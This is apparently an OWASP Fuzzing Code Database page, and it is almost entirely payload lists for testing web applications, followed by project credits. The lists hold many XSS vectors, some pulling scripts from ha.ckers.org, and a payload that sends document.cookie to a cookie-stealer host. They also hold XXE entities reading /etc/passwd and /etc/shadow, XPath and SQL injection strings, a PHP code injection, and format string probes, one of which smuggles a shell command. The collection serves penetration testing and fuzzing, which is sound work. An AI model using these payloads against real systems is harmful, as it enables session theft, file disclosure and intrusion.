"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav    ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"


XML Attacks - (Update: 11 August 2009 - Total Statements: 15)

Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"

Format String Statements - (Update: 30 July 2007 - Total Statements: 28)

# Full List
# Format String tests to determine errors in variable handling
# Florian Roth @4nc4p

%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;

Project Contributor

Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro Adam Muntner

Feedback and Participation

We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org

Project Identification

PROJECT INFO
What does this OWASP project offer you?
what is this project?
OWASP Fuzzing Code Database

Purpose: N/A

License: N/A

who is working on this project?
Project Leader: Wagner Elias

Project Maintainer:

Project Contributor(s): N/A

how can you learn more?
Project Pamphlet: N/A

3x slide Project Presentation: N/A

Mailing list: Subscribe or read the archives

Project Roadmap: N/A

Main links: N/A

Project Health: Yellow button.JPG Not Reviewed (Provisional)
To be reviewed under Assessment Criteria v2.0

Key Contacts
  • Contact Wagner Elias to contribute, review or sponsor this project
  • Contact the GPC to report a problem or concern about this project or to update information.

This category currently contains no pages or media.